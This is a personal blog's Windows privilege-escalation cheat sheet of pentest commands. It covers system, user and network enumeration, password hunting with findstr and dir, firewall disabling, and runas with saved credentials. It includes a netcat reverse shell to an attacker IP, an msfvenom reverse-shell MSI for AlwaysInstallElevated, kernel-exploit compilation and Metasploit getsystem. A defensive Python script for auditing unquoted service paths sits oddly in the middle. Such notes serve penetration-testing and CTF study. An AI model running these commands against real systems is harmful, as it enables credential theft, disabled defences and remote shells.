Adithyan's Blog

Windows Privilege Escalation


  • OS Info Enumeration
    • systeminfo
    • hostname
    • echo %username%
    • wmic qfe -> check patches
    • wmic logicaldisk -> get other disk information
  • User Enumeration
    • whoami
    • whoami /priv -> check user privileges
    • whoami /groups -> check user groups
    • net user -> list all users
    • net user <username> -> check groups associated with a user
    • net localgroup -> Check all the local groups available
    • net localgroup <group name> -> List the members of the given localgroup
  • Task | Service | Process Enumeration
    • sc queryex type= service (lists all services)
    • tasklist /SVC
    • tasklist
    • net start
    • wmic product get name, version, vendor
  • Permission Enumeration
    • In C:\Program Files: icacls <program_name> (check who can modify installed program folders)
    • icacls root.txt /grant <username>:F (to grant permission to access a file)
    • Check the PowerShell history file: type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    • Check stored usernames and passwords
      • cmdkey /list
  • Network based
    • ipconfig
    • ipconfig /all
    • arp -a
    • route print
    • netstat -ano
  • Password Hunting
    • findstr /si password *.txt *.ini *.config (try searching in different directories)
    • dir /s *pass* == *cred* == *vnc* == *.config*
    • dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
    • where /R C:\ user.txt
    • where /R C:\ *.ini
  • AV / Firewall check / Service Enumeration
    • sc query windefend
    • netsh advfirewall firewall dump
    • netsh advfirewall show currentprofile
    • netsh advfirewall firewall show rule name=all
    • netsh firewall show state (show whether the firewall is running or stopped)
    • netsh firewall show config (show firewall configuration)
    • netsh firewall set opmode disable (disable firewall)
  • Scheduled Tasks
    • schtasks /query /fo LIST /v
  • Mount Information
    • mountvol

Escalation Techniques

Service Account Priv Esc (Token Impersonation)
  • whoami /priv
Run As:
Use cmdkey to list the credentials stored on the machine:
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Using runas with a saved or provided set of credentials:
runas /savecred /user:admin C:\PrivEsc\reverse.exe
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Access check:
  • accesschk.exe -ucqv [service_name] /accepteula
  • accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
  • Find all weak folder permissions per drive.
    • accesschk.exe /accepteula -uwdqs Users c:\
    • accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
  • Find all weak file permissions per drive.
    • accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
    • accesschk.exe /accepteula -uwqs Users c:\*.*
    • accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
  • Powershell:
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Unquoted Service Path Privilege Escalation

PATH directories with weak permissions

C:\Temp> for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
C:\Temp> for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
C:\Temp> sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
C:\Temp> type Servicenames.txt
C:\Temp> FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
C:\Temp> FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
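The unquoted-service-path check above, as an added offline audit example (not part of the original notes): it parses constructed `wmic service get Name,PathName /format:csv` output and lists the intermediate paths the service control manager would probe before the real binary. The parent directories of those paths are what an administrator should check with icacls; the hostnames, service names and paths in the sample are made up.

```python
# Constructed sample of `wmic service get Name,PathName /format:csv` output
# (hostnames, service names and paths are made up for this example).
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName
HOST1,GoodSvc,"C:\Program Files\Vendor\good.exe" -run
HOST1,WeakSvc,C:\Program Files\Vendor App\weak.exe -svc
HOST1,SysSvc,C:\Windows\system32\svchost.exe -k netsvcs
HOST1,NoSpaceSvc,C:\Tools\plain.exe
"""


def executable_candidates(path_name: str) -> list[str]:
    """Paths the service control manager would try before the intended
    binary when an unquoted PathName contains spaces; [] if not affected."""
    path = path_name.strip()
    if not path or path.startswith('"'):
        return []  # quoted: the executable is unambiguous
    tokens = path.split(" ")
    candidates = []
    prefix = tokens[0]
    for token in tokens[1:]:
        if prefix.lower().endswith(".exe"):
            break  # executable located; the remaining tokens are arguments
        candidates.append(prefix + ".exe")  # e.g. C:\Program.exe
        prefix = prefix + " " + token
    return candidates


def find_unquoted_services(wmic_csv: str) -> dict[str, list[str]]:
    """Map each affected service name to the intermediate paths to audit."""
    findings: dict[str, list[str]] = {}
    for line in wmic_csv.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue  # skip wmic's blank first line and the header row
        parts = line.split(",", 2)  # Node,Name,PathName (PathName may contain commas)
        if len(parts) != 3:
            continue
        _, name, path_name = parts
        candidates = executable_candidates(path_name)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for svc, paths in find_unquoted_services(SAMPLE_WMIC_CSV).items():
        # The parent directory of each path is what to check with icacls: if
        # Users or Authenticated Users can write there, quote the service path
        # (sc config <name> binPath= "\"...\"") or tighten the directory ACL.
        print(svc, "->", paths)
```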
Always Install Elevated:
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f msi > install.msi
C:> msiexec /quiet /qn /i install.msi
Kernel Exploits:
i686-w64-mingw32-gcc exploit.c -o exploit
or, for 32-bit with Winsock linked in:
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32

Automated Enumeration Tools

Metasploit:
  • getsystem
  • run post/multi/recon/local_exploit_suggester
Resources: